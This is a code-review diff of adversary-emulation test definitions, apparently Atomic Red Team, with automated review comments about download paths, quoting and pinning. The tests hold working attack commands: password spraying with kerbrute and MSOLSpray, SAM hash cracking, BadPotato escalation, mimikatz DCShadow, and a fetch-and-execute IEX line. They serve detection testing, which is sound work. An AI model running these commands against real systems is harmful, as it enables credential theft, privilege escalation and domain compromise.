@@ -24,20 +24,21 @@ atomic_tests: - description: Hashcat must exist on disk at specified location (#{hashcat_exe}) prereq_command: 'if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1}' get_prereq_command: |- - Invoke-WebRequest "https://www.7-zip.org/a/7z1900.exe" -OutFile "$env:TEMP\7z1900.exe" - Start-Process -FilePath "$env:Temp\7z1900.exe" -ArgumentList "/S /D=$env:temp\7zi" -NoNewWindow - Invoke-WebRequest "https://hashcat.net/files/hashcat-6.1.1.7z" -OutFile "$env:TEMP\hashcat6.7z" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.7-zip.org/a/7z1900.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe" + Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe" -ArgumentList "/S /D=PathToAtomicsFolder\..\ExternalPayloads\7zi" -NoNewWindow + Invoke-WebRequest "https://hashcat.net/files/hashcat-6.1.1.7z" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z" Start-Process cmd.exe -Args "/c %temp%\7z\7z.exe x %temp%\hashcat6.7z -aoa -o%temp%\hashcat-unzip" -Wait New-Item -ItemType Directory (Split-Path $(cmd /c echo #{hashcat_exe})) -Force | Out-Null - Move-Item $env:Temp\hashcat-unzip\hashcat-6.1.1\* $(cmd /c echo #{hashcat_exe}\..) -Force -ErrorAction Ignore + Move-Item PathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip\hashcat-6.1.1\* $(cmd /c echo #{hashcat_exe}\..) -Force -ErrorAction Ignore executor: command: |- cd #{hashcat_exe}\.. 
#{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}
cleanup_command: |-
- del %temp%\hashcat6.7z >nul 2>&1
- del %temp%\7z1900.exe >nul 2>&1
- del %temp%\7z /Q /S >nul 2>&1
- del %temp%\hashcat-unzip /Q /S >nul 2>&1
+ del PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z >nul 2>&1
+ del PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe >nul 2>&1
+ del PathToAtomicsFolder\..\ExternalPayloads\7z /Q /S >nul 2>&1
+ del PathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip /Q /S >nul 2>&1
name: command_prompt
elevation_required: true
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index 6ba5912b..ee222687 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
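Review bot: The unchanged `Start-Process cmd.exe -Args "/c %temp%\7z\7z.exe x %temp%\hashcat6.7z -aoa -o%temp%\hashcat-unzip" -Wait` still reads the archive from and extracts to %temp%, but the new lines download hashcat6.7z to ExternalPayloads and then `Move-Item` from `ExternalPayloads\hashcat-unzip`, so the archive is never found and nothing is moved into place. The 7-Zip installer is also directed to `/D=...\ExternalPayloads\7zi` while the extract step and the cleanup (`del ...\ExternalPayloads\7z`) expect a `7z` folder, a mismatch that predates this patch. Rewrite the extract line to `Start-Process cmd.exe -Args "/c PathToAtomicsFolder\..\ExternalPayloads\7z\7z.exe x PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z -aoa -oPathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip" -Wait` and make the `/D=` target `7z`, so install, extract and cleanup agree.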
@@ -242,16 +242,17 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - MSOLSpray module must exist in $env:temp. + MSOLSpray module must exist in PathToAtomicsFolder\..\ExternalPayloads. prereq_command: | - if (test-path $env:temp\MSOLSpray.ps1){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://raw.githubusercontent.com/dafthack/MSOLSpray/922f159104fb3ec77c9fc6507a6388a05c227b5f/MSOLSpray.ps1" -outfile "$env:temp\MSOLSpray.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://raw.githubusercontent.com/dafthack/MSOLSpray/922f159104fb3ec77c9fc6507a6388a05c227b5f/MSOLSpray.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1" executor: name: powershell elevation_required: false command: | - import-module "$env:temp\MSOLSpray.ps1" + import-module "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1" Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}" - name: Password Spray using Kerbrute Tool auto_generated_guid: c6f25ec3-6475-47a9-b75d-09ac593c5ecb 
@@ -271,23 +272,24 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - kerbrute.exe must exist in $env:temp + kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe" - description: | - passwordspray.txt must exist in $env:temp + passwordspray.txt must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\passwordspray.txt){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "$env:temp\passwordspray.txt" + invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt" executor: name: powershell elevation_required: false command: | - cd $env:temp - .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132 + cd PathToAtomicsFolder\..\ExternalPayloads + .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt password132 - name: AWS - Password Spray an AWS using GoAWSConsoleSpray auto_generated_guid: 
9c10d16b-20b1-403a-8e67-50ef7117ed4e description: | diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index df4c510e..ae76069a 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml 
@@ -81,20 +81,21 @@ atomic_tests: dependency_executor_name: powershell dependencies: - description: | - kerbrute.exe must exist in $env:temp + kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe" - description: | - bruteforce.txt must exist in $env:temp + bruteforce.txt must exist in PathToAtomicsFolder\..\ExternalPayloads prereq_command: | - if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1} + if (test-path PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt){exit 0} else {exit 1} get_prereq_command: | - invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt" + invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt" executor: name: powershell elevation_required: false command: | - cd $env:temp - .\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} $env:temp\bruteforce.txt + cd PathToAtomicsFolder\..\ExternalPayloads + .\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt diff --git a/atomics/T1133/T1133.yaml b/atomics/T1133/T1133.yaml index 68f973f9..7e874dba 100644 --- a/atomics/T1133/T1133.yaml 
+++ b/atomics/T1133/T1133.yaml @@ -24,8 +24,9 @@ atomic_tests: Chrome must be installed prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url} - Start-Process $env:temp\ChromeStandaloneSetup64.exe /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.exe #{chrome_url} + Start-Process PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.exe /S executor: name: powershell elevation_required: true diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml index 454f89b9..b6a1e95e 100644 --- a/atomics/T1134.001/T1134.001.yaml +++ b/atomics/T1134.001/T1134.001.yaml @@ -40,7 +40,7 @@ atomic_tests: nsudo_path: description: 'Path to the NSudo bat file' type: path - default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe + default: PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe dependency_executor_name: powershell dependencies: - description: | 
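Review bot: The `nsudo_path` description still reads 'Path to the NSudo bat file' while both the old and the new default point at `NSudoLG.exe`; change it to `description: 'Path to the NSudoLG.exe launcher'` so operators overriding the argument know which file is expected. The new default keeps the `NSudo_Launcher` (underscore) directory, which only exists if the prereq in the next hunk actually relocates the binary there.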
@@ -48,10 +48,11 @@ atomic_tests:
prereq_command: |
if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
get_prereq_command: |
- Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
- Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
- Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
- Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+ Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+ Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Force
+ Rename-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "#{nsudo_path}"
+ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -Recurse -ErrorAction Ignore
executor:
command: |
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
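Review bot: `Rename-Item "...\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "#{nsudo_path}"` gives a new name that lives in a different directory (`NSudo_Launcher\x64`), and Rename-Item refuses to move an item between directories, so the prereq errors and `#{nsudo_path}` never appears; the old line renamed the `NSudo Launcher` directory itself, a same-parent rename that worked. Replace it with a move that creates the destination first: `New-Item -ItemType Directory (Split-Path "#{nsudo_path}") -Force | Out-Null` followed by `Move-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "#{nsudo_path}" -Force`. That also keeps working when a user overrides nsudo_path to a location outside the extracted tree, which the rename never could.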
@@ -70,12 +71,13 @@ atomic_tests: - description: | BadPotato.exe must exist in the temp directory prereq_command: | - if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true" executor: command: | - cd $env:temp + cd PathToAtomicsFolder\..\ExternalPayloads Start-Process .\BadPotato.exe notepad.exe Start-Sleep -Second 20 Stop-Process -Name "notepad" -force -erroraction silentlycontinue diff --git a/atomics/T1134.005/T1134.005.yaml b/atomics/T1134.005/T1134.005.yaml index 20511cae..f5603092 100644 --- a/atomics/T1134.005/T1134.005.yaml +++ b/atomics/T1134.005/T1134.005.yaml @@ -19,7 +19,7 @@ atomic_tests: mimikatz_path: description: Mimikatz windows executable type: path - default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: - description: | 
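Review bot: The dependency description 'BadPotato.exe must exist in the temp directory' is now wrong — the prereq checks and downloads under `PathToAtomicsFolder\..\ExternalPayloads` — and it is the text shown to operators when the prereq fails; update it to `BadPotato.exe must exist in PathToAtomicsFolder\..\ExternalPayloads`. The binary is fetched from the `master` branch of the atomic-red-team repo rather than a pinned commit, unlike most other prereqs in this patch; pinning it would make the executable actually run reproducible.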
@@ -29,6 +29,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases" $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") } diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 40bc28c2..8431d0e1 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -113,12 +113,13 @@ atomic_tests: default: -CheckShareAccess dependencies: - description: Invoke-ShareFinder module must exist in %TEMP% directory - prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}' + prereq_command: 'if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1) {exit 0} else {exit 1}' get_prereq_command: | - Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1 + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1 executor: command: | - Import-Module $env:TEMP\PowerView.ps1 + Import-Module PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1 Invoke-ShareFinder #{parameters} name: powershell - name: WinPwn - shareenumeration diff --git a/atomics/T1187/T1187.yaml b/atomics/T1187/T1187.yaml index 5f9d0da2..34958094 100644 --- a/atomics/T1187/T1187.yaml 
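Review bot: The added `New-Item` sits directly ahead of the unchanged `IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)`, which executes whatever is on that branch at run time, whereas the other prereqs touched by this patch pin a commit SHA. Pinning that URL to a specific commit (or vendoring the helper) would make the mimikatz fetch reproducible and take a branch rewrite out of the trust chain; this predates the patch, so at minimum a `# TODO: pin Invoke-FetchFromZip to a commit` comment on the line is worth adding.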
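Review bot: The unchanged dependency description `Invoke-ShareFinder module must exist in %TEMP% directory` no longer matches the prereq check and download, which now use `PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1`; change it to `- description: Invoke-ShareFinder module must exist in PathToAtomicsFolder\..\ExternalPayloads` so a failing prereq points operators at the right place. Both the `-OutFile PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1` and the executor's `Import-Module PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1` are unquoted and will split on a space in the substituted path; quote both as the New-Item line already does.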
+++ b/atomics/T1187/T1187.yaml @@ -23,7 +23,7 @@ atomic_tests: petitpotam_path: description: PetitPotam Windows executable type: path - default: '$env:TEMP\PetitPotam.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\PetitPotam.exe' dependency_executor_name: powershell dependencies: - description: | @@ -32,6 +32,7 @@ atomic_tests: prereq_command: | if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" executor: name: powershell diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml index b78285c7..adc552de 100644 --- a/atomics/T1207/T1207.yaml +++ b/atomics/T1207/T1207.yaml @@ -32,11 +32,11 @@ atomic_tests: mimikatz_path: description: Mimikatz windows executable type: path - default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe' psexec_path: description: Path to PsExec type: path - default: C:\PSTools\PsExec.exe + default: PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: - description: | 
@@ -57,16 +57,16 @@ atomic_tests: prereq_command: | if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_path}" -Force executor: name: powershell elevation_required: true command: | # starting fake DC server, as SYSTEM (required) - $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" + $dc_output_file = "PathToAtomicsFolder\..\ExternalPayloads\art-T1207-mimikatz-DC.log" Remove-Item $dc_output_file -ErrorAction Ignore $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`"" $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index a2b21a7e..fd67dc2b 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -98,7 +98,7 @@ atomic_tests: Ammyy_Admin_Path: description: Path of Ammyy Admin executable type: path - default: $env:temp\ammyy.exe + default: PathToAtomicsFolder\..\ExternalPayloads\ammyy.exe dependency_executor_name: powershell dependencies: - description: | 
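Review bot: This prereq downloads to `-OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"` without the `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null` guard the other hunks in this patch add, so it fails on a host where no other test has created the folder yet; add the guard as the first line. The executor's `$dc_output_file` now points into ExternalPayloads and is spliced unquoted into `"log $dc_output_file"` inside the mimikatz command string, so a substituted path containing a space is likely to be truncated by mimikatz's own argument parsing — the old %TEMP% path had the same exposure, but it deserves a note in the test description. The executor command continues past the end of the hunk.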
@@ -106,7 +106,8 @@ atomic_tests: prereq_command: | if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -OutFile "$env:temp\ammyy.exe" -UseBasicParsing + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ammyy.exe" -UseBasicParsing executor: command: | Start-Process #{Ammyy_Admin_Path} @@ -125,7 +126,7 @@ atomic_tests: RemotePC_Path: description: Path of RemotePC executable type: path - default: $env:temp\RemotePC.exe + default: PathToAtomicsFolder\..\ExternalPayloads\RemotePC.exe dependency_executor_name: powershell dependencies: - description: | @@ -133,6 +134,7 @@ atomic_tests: prereq_command: | if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe" -OutFile "#{RemotePC_Path}" -UseBasicParsing executor: command: | @@ -160,7 +162,7 @@ atomic_tests: NetSupport_Path: description: Path to the NetSupport executable. type: path - default: $env:temp\T1219_NetSupport.exe + default: PathToAtomicsFolder\..\ExternalPayloads\T1219_NetSupport.exe dependency_executor_name: powershell dependencies: - description: | @@ -168,6 +170,7 @@ atomic_tests: prereq_command: | if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null (New-Object Net.WebClient).DownloadFile("https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe","#{NetSupport_Path}") executor: command: | 
@@ -186,7 +189,7 @@ atomic_tests: UltraViewer_Path: description: Path to the UltraViewer executable. type: path - default: $env:temp\T1219_UltraViewer.exe + default: PathToAtomicsFolder\..\ExternalPayloads\T1219_UltraViewer.exe dependency_executor_name: powershell dependencies: - description: | @@ -194,6 +197,7 @@ atomic_tests: prereq_command: | if (Test-Path #{UltraViewer_Path}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null (New-Object Net.WebClient).DownloadFile("https://www.ultraviewer.net/en/UltraViewer_setup_6.5_en.exe","#{UltraViewer_Path}") executor: command: | @@ -222,8 +226,9 @@ atomic_tests: prereq_command: | if (Test-Path #{UltraVNC_Viewer_Path}) {exit 0} else {exit 1} get_prereq_command: | - Start-BitsTransfer -Source "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -Destination $env:temp\vncsetup.exe -dynamic - start-process $env:temp\vncsetup.exe /silent + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://www.uvnc.eu/download/1381/UltraVNC_1_3_81_X64_Setup.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\vncsetup.exe" + start-process PathToAtomicsFolder\..\ExternalPayloads\vncsetup.exe /silent executor: command: | Start-Process #{UltraVNC_Viewer_Path} 
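Review bot: In the UltraVNC hunk, `start-process PathToAtomicsFolder\..\ExternalPayloads\vncsetup.exe /silent` returns immediately, so the runner's re-check of `Test-Path #{UltraVNC_Viewer_Path}` can run before the installer has written the viewer and report the prerequisite as unmet; the path is also unquoted and will be split if the resolved atomics folder contains a space. Suggest `Start-Process "PathToAtomicsFolder\..\ExternalPayloads\vncsetup.exe" -ArgumentList "/silent" -Wait`. The replacement `Invoke-WebRequest` also lacks the `-UseBasicParsing` that the Ammyy and RemotePC downloads in this file use, which matters on Windows PowerShell 5.1 hosts where the IE engine has not been initialised.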
@@ -250,8 +255,9 @@ atomic_tests: prereq_command: | if (Test-Path #{MSP360_Connect_Path}) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\msp360connect.exe "https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9" - start-process $env:temp\msp360connect.exe /S + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe "https://s3.amazonaws.com/cb_setups/_current/cbra/setup.exe?X-Amz-Expires=604800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIA2WIZE3YN7NOSY65U/20230515/us-east-1/s3/aws4_request&X-Amz-Date=20230515T024742Z&X-Amz-SignedHeaders=host&response-content-disposition=attachment;filename=ConnectStandaloneSetup_v3.3.0.15_netv4.5.1_cFA9100C6.exe&X-Amz-Signature=1fe3ddf93f8431b182fac90341f80a4ebf8665ddcc0e36dd385ee20d0ce865c9" + start-process PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe /S executor: command: | Start-Process #{MSP360_Connect_Path} diff --git a/atomics/T1482/T1482.yaml b/atomics/T1482/T1482.yaml index dfa4c0f5..d0205711 100644 --- a/atomics/T1482/T1482.yaml +++ b/atomics/T1482/T1482.yaml 
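Review bot: The MSP360 hunk carries over a pre-signed S3 URL whose `X-Amz-Date=20230515T024742Z` and `X-Amz-Expires=604800` make it valid only until 2023-05-22, so the `Invoke-WebRequest` will receive a 403 on any later run and this prerequisite can never be satisfied; the test should point at a stable download URL or state in its description that the link must be refreshed. As with the UltraVNC hunk, `start-process PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe /S` neither quotes the path nor waits, so `Start-Process "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" -ArgumentList "/S" -Wait` would be safer. The `-OutFile` argument on the download line is unquoted too, while the sibling hunks quote it.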
@@ -44,9 +44,10 @@ atomic_tests: - description: | PowerView PowerShell script must exist on disk prereq_command: | - if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} + if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1) {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1" - description: | RSAT PowerShell AD admin cmdlets must be installed prereq_command: | @@ -55,7 +56,7 @@ atomic_tests: Write-Host "Sorry RSAT must be installed manually" executor: command: | - Import-Module "$env:TEMP\PowerView.ps1" + Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1" Get-NetDomainTrust Get-NetForestTrust Get-ADDomain @@ -147,7 +148,7 @@ atomic_tests: trufflesnout_path: description: Path to the TruffleSnout executable type: path - default: PathToAtomicsFolder\T1482\src\TruffleSnout.exe + default: PathToAtomicsFolder\..\ExternalPayloads\TruffleSnout.exe domain: description: Domain name to search on type: string diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml index 39b83d83..7696c5e1 100644 --- a/atomics/T1485/T1485.yaml +++ b/atomics/T1485/T1485.yaml 
